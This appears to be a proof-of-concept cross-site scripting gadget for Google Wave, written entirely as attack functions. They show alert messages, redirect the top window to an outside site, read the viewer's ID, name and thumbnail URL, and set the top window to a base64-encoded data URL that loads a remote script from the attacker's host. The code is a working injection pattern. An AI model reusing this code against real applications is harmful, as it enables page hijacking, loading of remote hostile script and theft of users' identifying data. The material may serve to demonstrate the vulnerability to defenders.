function actionPwn() { alert("onAction attack"); } function actionPwn2() { alert("onAction attack 2: Location manipulation"); window.top.location = "http://www.e-x-e.dk"; } function actionPwn3() { alert("onAction attack 3: Viewer informations"); alert("Viewer ID: " + wave.getViewer().getId()); alert("Viewer displayname: " + wave.getViewer().getDisplayName()); alert("Viewer thumbnail url: " + wave.getViewer().getThumbnailUrl()); } function actionPwn4() { alert("onAction attack 4: Location manipulation, local content"); window.top.location = "data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly93d3cuZS14LWUuZGsvbGFicy94c3NJbmplY3Rpb24veHNzMS5qcyI+PC9zY3JpcHQ+"; } function init() { alert("Start of the XSS attack, loaded gadget load"); } gadgets.util.registerOnLoadHandler(init); onAction attacks
]]>